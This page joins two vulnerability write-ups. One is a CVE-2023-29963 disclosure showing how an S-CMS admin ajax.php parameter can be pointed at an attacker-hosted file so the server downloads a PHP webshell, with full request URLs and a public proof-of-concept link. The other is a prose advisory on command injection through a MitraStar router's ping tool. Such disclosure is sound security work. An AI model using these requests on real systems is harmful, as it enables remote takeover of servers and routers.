2.Because the vulnerability is the background command execution requires logging in to the background administrator account. The loophole interface address is: http://10.10.10.8/admin/ajax.php?Type=collection&ACTION=All&pageurl=http://10.10.8:88/1.tXt&ID=1 Directly request test

3.After the request is successful, a randomly named PHP file will be generated in the Media directory. This file is our sentence Trojan. Let's visit and execute the command

4.Let ’s analyze the cause of the vulnerability. The vulnerability position is under admin/ajax.php file, and re -request the vulnerability URL:http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=http://10.10.10.8:88/1.txt&id=1 使用PhpStorm 开启调试并在以下位置设置断点

5.First check the fields in the SL\_COMENT table. If the data exists, continue to execute downward

6.Extract all the data in the SL\_COMENT table, and then bring the lrl (http://10.10.8:88/1.txt) the URL (http://10.10.8:88/1.txt) we give

7.The result of extraction returned and assigned value, we see that the return value is analyzed by the http://10.10.10.8:88/2.php link in the return value

8.Then download and read the content of the 2.php file, follow the downpic function

9.The PHP suffix of 2.php will be used as a preserved file suffix. The file name is used with the current time with random 3 -digit number to combine new file names. The 2.php file content is written into the Media directory through the file\_put\_contents method

10.Through the above operations, the Trojan horse will be written into the system. We can execute the system arbitrarily by accessing the PHP file.

11.The following two points need to be used to use this vulnerability:

11.1.Create a text file that is a similar data format in the SL\_Collection table. Because the system will request the data in the table and extract the URL link in SRC, which is 2.PHP

11.2. 2.php In a phrase Trojan, note that the file cannot be run in the PHP environment, because the request needs a return value, all I use Python to start a HTTP service

!\[image\](https://user-images.githubusercontent.com/113097106/227728467-f34ce272-5cce-46eb-82cd-fca1ea25d9ec.png

12.Online POC uses links : http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=https://raw.githubusercontent.com/superjock1988/debug/main/1.txt&id=1 Just need to modify the local server IP addre

CVE-2023-29963: debug/s-cms_rce.md at main · superjock1988/debug

MitraStar GPT-2741GNAC-N2 with firmware BR_g5.9_1.11(WVK.0)b32 was discovered to contain a remote code execution (RCE) vulnerability in the ping function.

**Code execution on MitraStar GPT-2741GNAC-N2.**

Should work on GPT-2741GNAC-N1.

Firmware: BR\_g5.9\_1.11(WVK.0)b32 (last version at this moment.)

Exploit: We can pass a pipe to execute commands with the ping diagnostic tool of the router.

Considering a variable $GATEWAY=192.168.15.1 (generally the MitraStar gateway)

We can access the panel in http://GATEWAY/padrao

After logging, we can go to this field: (Im logging with support user)  

We can do a simple ping and see the tool working: 

But a simple and poisonous shell pipe operator give us a possibilty to exec commands in operational system. 

It seems we have permissions in root FS too: (Considering that I logged in using the support user, the password I used is the one under the router.)

Tag

#rce